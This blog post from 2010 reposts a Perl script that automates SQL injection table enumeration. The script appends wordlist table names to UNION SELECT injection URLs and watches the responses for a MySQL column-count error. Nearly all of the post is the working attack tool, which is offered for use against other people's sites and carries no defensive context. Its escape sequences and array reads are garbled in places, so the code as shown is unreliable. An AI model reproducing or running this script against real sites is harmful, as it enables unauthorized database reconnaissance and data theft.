Wednesday, August 25, 2010

SQL injection table searcher (perl)



#!/usr/bin/perl
#coded by skillfak3r


#NOTE: U must have the 2 txt files present, urls.txt and wordlist.txt
#its self-explanatory ;)


#input the url in urls.txt like this:
# http://www.somesite.com/galerie3/gal...age.php?pid=-1 union all select 1 from


use LWP::UserAgent;
$xsc = "urls.txtn";
$source = "wordlist.txtn";
my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)' );
open(FILE, $source) or die("wtf??Can't open it!n");
my @tables = ;
close(FILE);


open(FILEZ, $xsc) or die("wtf??Can't open it!n");
my @urls = ;
close(FILEZ);


foreach $url (@urls) {
$url =~ s/^s+//;
$url =~ s/s+$//;


print "TARGET - $urlnnn";
foreach $table (@tables) {
$table =~ s/^s+//;
$table =~ s/s+$//;
print "TRYING $table - ";
my $response = $ua->get($url . ' ' . $table .'--');
if ($response->is_success) {
if ($response->content =~ m/The used SELECT statements have a different number of columns/gi) {
print "tOKnn";
last;
} else {
print "tFAILEDn";
next;
}


}
else {
print "FAIL - $response->status_linenn";
}
}
}
print "nnn[[DONE]]n";
$x = <>;


Source: http://hackguide4u.blogspot.com/2010/08/sql-injection-table-searcher-perl.html


Digg Google Bookmarks reddit Mixx StumbleUpon Technorati Yahoo! Buzz DesignFloat Delicious BlinkList Furl

0 nhận xét: on "SQL injection table searcher (perl)"

Post a Comment